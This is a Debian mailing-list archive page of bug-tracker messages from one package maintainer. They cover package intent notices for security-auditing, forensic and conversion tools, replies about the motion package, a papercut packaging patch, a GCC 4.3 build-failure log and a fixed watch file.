for the Debian project (but may be used by others).


Bug#477410: ITP: lsat -- A post install security auditor

2008-04-22 Thread Juan Angulo Moreno

Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: lsat
* Version : 0.9.6
* Upstream Author : Triode [EMAIL PROTECTED]
* URL : http://usat.sourceforge.net/
* License : GPL
* Description : (follows)

The Linux Security Auditing Tool (LSAT) is a post install
security auditor for Linux/Unix. It checks many system configurations
and local network settings on the system for common security/config
errors and for packages that are not needed. 


--
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#476594: motion: Motion lock my DVB-T card

2008-04-20 Thread Juan Angulo Moreno

Hi,

El driver de su DVB-T card no soporta que dos aplicaciones a la vez 
(motion y kaffeine) accedan al mismo dispositivo. Es por ello que usted 
debe desactivar uno para poder ejecutar el otro.


No es un bug de motion.

Frederic MASSOT escribió:

Package: motion
Version: 3.2.9-2
Severity: normal


Hi,

When Motion runs, I can no watch TV with Kaffeine, and scanning DVB-T channel 
generates timeout.

Motion lock my DVB-T card (ASUSTeK P7131 Hybrid) with saa7134 chipset.

I do not know if this is a bug or a feature. :o)

Regards.


-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24 (PREEMPT)
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages motion depends on:
ii  adduser  3.107   add and remove users and groups
ii  debconf [debconf-2.0]1.5.20  Debian configuration management sy
ii  libavcodec1d 0.cvs20070307-6 ffmpeg codec library
ii  libavformat1d0.cvs20070307-6 ffmpeg file format library
ii  libavutil1d  0.cvs20070307-6 ffmpeg utility library
ii  libc62.7-10  GNU C Library: Shared libraries
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libmysqlclient15off  5.0.51a-3   MySQL database client library

ii  libpq5   8.3.1-1 PostgreSQL C client library

Versions of packages motion recommends:
ii  ffmpeg3:20080414-0.0 audio/video encoder, streaming ser

-- debconf information:
* motion/moved_conf_dir:


  






Bug#476594: motion: Motion lock my DVB-T card

2008-04-20 Thread Juan Angulo Moreno

Sorry,

I thought that he had written in English and I did it in my native 
language: S


The answer is: The driver of the DVB-T card does not support that two 
applications at once (motion and kaffeine) accessing the same device. 
That is why you must deactivate one to run the other.


Is is not bug of motion.


Frederic MASSOT escribió:

Package: motion
Version: 3.2.9-2
Severity: normal


Hi,

When Motion runs, I can no watch TV with Kaffeine, and scanning DVB-T channel 
generates timeout.

Motion lock my DVB-T card (ASUSTeK P7131 Hybrid) with saa7134 chipset.

I do not know if this is a bug or a feature. :o)

Regards.


-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24 (PREEMPT)
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages motion depends on:
ii  adduser  3.107   add and remove users and groups
ii  debconf [debconf-2.0]1.5.20  Debian configuration management sy
ii  libavcodec1d 0.cvs20070307-6 ffmpeg codec library
ii  libavformat1d0.cvs20070307-6 ffmpeg file format library
ii  libavutil1d  0.cvs20070307-6 ffmpeg utility library
ii  libc62.7-10  GNU C Library: Shared libraries
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libmysqlclient15off  5.0.51a-3   MySQL database client library

ii  libpq5   8.3.1-1 PostgreSQL C client library

Versions of packages motion recommends:
ii  ffmpeg3:20080414-0.0 audio/video encoder, streaming ser

-- debconf information:
* motion/moved_conf_dir:


  






Bug#433308: Adoption

2008-02-24 Thread Juan Angulo Moreno

Hi,

César Gómez Martín wrote:


Anyway, it is good to have the bugs fixed. Do you want to adopt it?


I don't want to adopt this package. My job was to close the RC and a 
minor bug (by QA Group).


What I saw, Anibal in the mail earlier reassigned to what you as the 
owner of the package. If you want adopt just need to upload a new version.


My apologies for the confusion of dates for its mail to the list of 
Debian Mentors.








Bug#433308: Adoption

2008-02-23 Thread Juan Angulo Moreno

Hi,

Cesar sent to the Debian Mentors maillist the RFS today:

http://www.mail-archive.com/[EMAIL PROTECTED]/msg53855.html

The change of ownership was made yesterday for Debian QA Group, as this 
was Orphan and had a bug RC (which was closed a couple of days ago).



Aníbal Monsalve Salazar wrote:

owner 433308 César Gómez Martín [EMAIL PROTECTED]
thanks

On Sat, Feb 23, 2008 at 07:19:45PM +, =?UTF-8?Q? C=C3=A9sar_?= Gómez  
=?UTF-8?Q?Mart=C3=ADn ?= wrote:

Hello, I was trying to adopt this package. There was a package at
mentors.d.o. waiting to be sponsored.

I think it is a good thing to contact the owner of the ITA bug before
uploading a new version.


Sorry about that César. I should have read your RFS posted to the
list.


César






Bug#462864: Patch

2008-02-21 Thread Juan Angulo Moreno

Package: papercut
Version: 0.9.13-4.1
Severity: serious
Tags: patch

Hi,

In the attachment you will find the patch to repair this bug.


--
Juan Angulo Moreno




--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.22-3-686

Debian Release: lenny/sid

--- Package information. ---
Depends (Version) | Installed
=-+-===
adduser   | 3.105
python| 2.4.4-6
python-support (= 0.7.1) | 0.7.6

diff -urNp papercut-0.9.13/debian/changelog papercut-0.9.13_new/debian/changelog
--- papercut-0.9.13/debian/changelog	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/changelog	2008-02-21 23:43:53.0 -0430
@@ -1,3 +1,15 @@
+papercut (0.9.13-4.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Added debian/papercut.postinst with user/group creation. (Closes: #462864)
+  * Fixed debian/papercut.postrm with delete user support.
+  * Fixed debian/papercut.init (with user daemon support).
+  * Added debian/pyDaemon.py library.
+  * Fixed papercut script with pyDaemon.py.
+  * Fixed .pid file (Its uses the default directory /var/run/papercut).
+
+ -- Juan Angulo Moreno [EMAIL PROTECTED]  Wed, 20 Feb 2008 03:29:33 -0430
+
 papercut (0.9.13-4) unstable; urgency=low
 
   * Switch to the new Python Policy. (Closes: #380886)
diff -urNp papercut-0.9.13/debian/control papercut-0.9.13_new/debian/control
--- papercut-0.9.13/debian/control	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/control	2008-02-21 18:50:45.0 -0430
@@ -2,14 +2,15 @@ Source: papercut
 Section: news
 Priority: optional
 Maintainer: Jérémy Bobbio [EMAIL PROTECTED]
-Build-Depends: debhelper (= 5.0.37.2), python-support (= 0.3)
+Build-Depends: debhelper (= 5.0.37.2), python-support (= 0.3), dpatch
 Build-Depends-Indep: python, xsltproc, docbook-xsl
-Standards-Version: 3.7.2
+Standards-Version: 3.7.3
+HomePage: http://pessoal.org/papercut/
 XS-Python-Version: current
 
 Package: papercut
 Architecture: all
-Depends: ${python:Depends}
+Depends: ${python:Depends}, adduser
 XB-Python-Version: ${python:Versions}
 Recommends: python-mysqldb, python-pgsql
 Suggests: phpbb2, mysql-server
@@ -32,5 +33,3 @@ Description: simple and extensible NNTP 
  Please note that Papercut is only a NNTP server, not a full-featured news
  transport system.  It does not handle newsfeeding or other usual news
  software features.
- .
- Homepage: http://pessoal.org/papercut/
diff -urNp papercut-0.9.13/debian/copyright papercut-0.9.13_new/debian/copyright
--- papercut-0.9.13/debian/copyright	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/copyright	2008-02-21 19:20:47.0 -0430
@@ -10,25 +10,47 @@ Changes:
   The docs/ directory and its content was removed: IETF RFCs are non-free
   in the DFSG sense.
 
+Files: *
 Copyright:
 
-  (c) 2002-2005 Joao Prado Maia [EMAIL PROTECTED]
-
-  Permission is hereby granted, free of charge, to any person obtaining a
-  copy of this software and associated documentation files (the Software),
-  to deal in the Software without restriction, including without limitation
-  the rights to use, copy, modify, merge, publish, distribute, sublicense,
-  and/or sell copies of the Software, and to permit persons to whom the
-  Software is furnished to do so, subject to the following conditions:
-
-  The above copyright notice and this permission notice shall be included in
-  all copies or substantial portions of the Software.
-
-  THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-  SOFTWARE.
+(c) 2002-2005 Joao Prado Maia [EMAIL PROTECTED]
 
+ Permission is hereby granted, free of charge, to any person obtaining a
+ copy of this software and associated documentation files (the Software),
+ to deal in the Software without restriction, including without limitation
+ the rights to use, copy, modify, merge, publish, distribute, sublicense,
+ and/or sell copies of the Software, and to permit persons to whom the
+ Software is furnished to do so, subject to the following conditions:
+
+ The above copyright notice and this permission notice shall be included in
+ all copies or substantial portions of the Software.
+
+ THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER

Bug#466163: ITP: scrounge-ntfs -- Data recovery program for NTFS file systems

2008-02-16 Thread Juan Angulo Moreno

Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: scrounge-ntfs
* Version : 0.9
* Upstream Author : Stef Walter [EMAIL PROTECTED]
* URL : http://memberwebs.com/stef/software/scrounge/
* License : Other
* Description : (follows)

Utility that can rescue data from corrupted NTFS partitions writes
the files retrieved to another working file system.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464866: ITP: anyremote -- Remote control service bluetooth, infrared, wi-fi or just TCP/IP connection.

2008-02-09 Thread Juan Angulo Moreno

Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: anyremote
* Version : 1.01
* Upstream Author : M. Fedotov [EMAIL PROTECTED]
* URL : http://anyremote.sourceforge.net
* License : GPL
* Description : (follows)

Remote control service through Bluetooth, InfraRed, Wi-Fi or just TCP/IP 
connection.


anyRemote supports wide range of modern cell phones like Nokia, 
SonyEricsson, Motorola and others.


It was developed as thin communication layer between Bluetooth (IR, 
Wi-Fi)-capabled phone and OS, and in principle could be configured to 
manage almost any software.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464542: ITP: tableau-parm -- tableau write-blocking bridge query/command utility

2008-02-07 Thread Juan Angulo Moreno

Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: tableau-parm
* Version : 0.1.0
* Upstream Author : Timothy D. Morgan
* URL : http://projects.sentinelchicken.org/tableau-parm/
* License : GPLv3
* Description : (follows)

The tableau-parm is an small command line utility designed to
interact with Tableau forensic write blockers. It performs
functions similar to the Tableau Disk Monitor.

Is designed to interact with write-blocking forensics
bridges produced by Tableau, LLC. It can be used to query
bridges for various bridge and device data, as well as to
disable DCO regions.

Thanks WNPP Team.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464460: ITP: memdump -- memory dumper for UNIX-like systems

2008-02-06 Thread Juan Angulo Moreno

Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: memdump
* Version : 1.01
* Upstream Author : Wietse Venema
* URL : http://www.porcupine.org/forensics/
* License : IBM Public License Version 1.0
* Description : (follows)

Is a program dumps system memory to the standard output stream,
skipping over holes in memory maps. By default, the program dumps
the contents of physical memory.

Thanks WNPP Team.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#463139: ITP: uif2iso -- Command-line tool for converting UIF files images to the original ISO format.

2008-01-29 Thread Juan Angulo Moreno
Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: uif2iso
* Version : 0.1.2
* Upstream Author : Luigi Auriemma
* URL : http://freshmeat.net/projects/uif2iso/
* License : GPL
* Description : (follows)

UIF2ISO is an open source command-line/GUI tool for converting single
and multipart UIF file images to the original ISO format.

The UIF image (Universal Image Format) in fact is just a compressed
ISO which can be created through the commercial program MagicISO.

Thanks WNPP Team.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#463166: ITP: uif2iso -- Command-line tool for converting DAA file images to the original ISO format

2008-01-29 Thread Juan Angulo Moreno
Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: daa2iso
* Version : 0.1.3
* Upstream Author : Luigi Auriemma
* URL : http://freshmeat.net/projects/daa2iso/
* License : GPL
* Description : (follows)

DAA2ISO is an open source command-line/GUI tool for converting single

and multipart DAA file images to the original ISO format.



The DAA image (Direct Access Archive) in fact is just a compressed ISO

which can be created through the commercial program PowerISO.

Thanks WNPP Team.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#457116: motion init script seems to start even if I use the default motion.conf

2008-01-03 Thread Juan Angulo Moreno
Hi,

You are right. For the next version fix this. Thank you for your suggestion.


Andrew M. Bishop wrote:
 The severity of this bug should be important or higher and it should
 be re-opened.  The answer given to the previous bug report is
 unacceptable.
 
 
 I also see this problem, but it is worse because I have V4L devices
 installed but I don't want to use them with motion.  The default
 configuration file /etc/motion/motion.conf contains the lines:
 
 # Start in daemon (background) mode and release terminal (default: off)
 daemon off
 
 
 When upgrading motion it found my TV capture cards and started motion
 using them.  This stopped the 'apt-get upgrade' process from
 completing.  I had to Control-C, edit the /etc/init.d/motion file and
 then re-run 'apt-get upgrade' to finish configuring the package.
 
 This means that booting the machine will start motion running but it
 won't background itself (I think this means that the boot will hang at
 this point).
 
 The default should not be to start motion at boot time unless the
 file /etc/default/motion specifies that it should be started (see
 other packages that do this, e.g. spamassassin or rsync).  It should
 also not be started if the default configuration file does not contain
 the line 'daemon on' since this will hang the startup.
 




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#458612: libfile-tail-perl: debian/watch fails to report upstream's version

2008-01-01 Thread Juan Angulo Moreno
Source: libfile-tail-perl
Version: 0.99.3-1
Severity: minor
Usertags: dehs-no-upstream

Hello maintainer,

The debian/watch file of your package on the unstable distribution fails
to report upstream's version.
Uscan's message follows:


uscan.pl warning: In /tmp/libfile-tail-perl_watchhSRwNw,
  no matching hrefs for watch line
  http://www.cpan.org/authors/id/M/MG/MGRABNAR/
(?:.*/)?libfile-tail-perl-?_?([\d+\.]+|\d+)\.(tar.*|tgz|zip|gz|bz2|)
debian uupdate


Please note that this message is auto-generated by extracting the
information from the Debian External Health Status (a.k.a. DEHS)
no_upstream page[1].

At the moment of running the package version found is the one indicated
in the report.
If you have already fixed this issue please ignore and close this report.

If you belive this message can be improved in any way don't hesitate to
contact me by replying to [EMAIL PROTECTED] (where N
is the number of this bug report).

If you wish not to be notified in the future contact me so I add you to
the ignore list.

[1] http://dehs.alioth.debian.org/no_upstream.html

Kind regards,

--
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#458612: Re[PATCH]: libfile-tail-perl: debian/watch fails to report upstream's version

2008-01-01 Thread Juan Angulo Moreno
tag 458612 patch
thanks

Attaching working watch file (needs to be renamed).

--
Juan Angulo Moreno
version=3
http://www.cpan.org/authors/id/M/MG/MGRABNAR/File-Tail-(.*)\.tar\.gz


Bug#456207: ITP: Timezonedb module for PHP 5

2007-12-13 Thread Juan Angulo Moreno
Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: *php5-timezonedb*
* Version : 2007.10
* Upstream Author : Derick Rethans
* URL : http://pecl.php.net/package/timezonedb
* License : PHP
* Description : (follows)

This extension is a drop-in replacement for the builtin timezone
database that comes with PHP.
You should only install this extension in case you need to get a later
version of the timezone
database than the one that ships with PHP.
 
The data that this extension uses comes from the Olson database,
which is located
at ftp://elsie.nci.nih.gov/pub/.

Thanks WNPP Team.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#455621: FTBFS with GCC 4.3: missing #includes

2007-12-11 Thread Juan Angulo Moreno
*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:499: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc: In function 'void dpyCanonBlock4(OutputContext, const
char*, const IFDEntry, const void*)':
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:550: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc:569: warning: deprecated conversion from string constant
to 'char*'
 dpyfuncs.cc: In function 'void dpyTypedComment(OutputContext, const
char*, const IFDEntry, const void*)':
 dpyfuncs.cc:803: error: 'strcmp' was not declared in this scope
 make[1]: *** [dpyfuncs.o] Error 1
 make[1]: Leaving directory `/build/tbm/metacam-1.2'

-- 

Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04





Bug#454130: linda: Update to the new Debian Policy (3.7.3)

2007-12-11 Thread Juan Angulo Moreno
Yep, linda report incorrect versión:

[EMAIL PROTECTED]:~/pkgs/imsniff$ linda -v -i *.changes
V: Processing file: imsniff_0.04-3_i386.changes
V: Processing file: imsniff_0.04-3.dsc
W: imsniff; 3.7.3 is a newer Standards-Version.
 This package appears to conform to a newer Standards-Version that has
 been released. One of us is incorrect.
V: Processing file: imsniff_0.04-3_i386.deb

Thanks,

-- 
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04





Bug#394196: workaround for reliably viewing the webcam stream in gecko

2007-11-03 Thread Juan Angulo Moreno
That is not bug of motion is a bad configuration of the browser cache (You
can see it in:
http://www.lavrsen.dk/twiki/bin/view/Motion/FrequentlyAskedQuestions#Firefox_shows_a_still_image_that).


--
Juan Angulo Moreno
http://www.0x29.com.ve





Bug#425241: I Intend to Adopt metacam

2007-08-20 Thread Juan Angulo Moreno
retitle 425241 ITA: metacam -- extract EXIF information from digital camera 
files
owner 425241 !
thanks




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#437135: tspc: Recursive Directory

2007-08-10 Thread Juan Angulo Moreno
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Package: tspc
Version: 2.1.1-6
Severity: normal

The directory /etc/tsp/templates is recursive:

lrwxrwxrwx  1 root root6 2007-08-10 08:57 template - ../tsp

I am using Debian GNU/Linux 4.0 (Etch).

- --
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGvIysyELb8TS8zQQRAs5BAKCXuQmknU9AkhgdddO5SxpoYvLfuwCbB6gK
LhgkdH2Mu4ayZHB4aWqiihQ=
=0A0t
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#430592: ITP: vsdump - is an ALT Linux project of VSD/VSS file format reverse engineering

2007-06-25 Thread Juan Angulo Moreno
Package: wnpp
Severity: wishlist
Owner: Juan Angulo Moreno [EMAIL PROTECTED]

* Package name: vsdump
* Version : 0.0.38
* Upstream Author : Valek Filippov [EMAIL PROTECTED]
* URL : http://www.gnome.ru/projects/vsdump_en.html
* License : GPL
* Description : (follows)

vsdump is an ALT Linux (www.altlinux.ru) project of VSD/VSS file format
reverse engineering.

This project was started with Ian Redfern results
(http://www.redferni.uklinux.net/visio/) and was greatly improved by
knowledges extracted from libgsf. The format description (discovered
parts) is stored in the docs/format.gnumeric.

Requirements: libgsf.

Thanks WNPP Team.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve
Fingerprint GPG: 0FEE E0BF 2904 FE77 1682 2171 C842 DBF1 34BC CD04




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]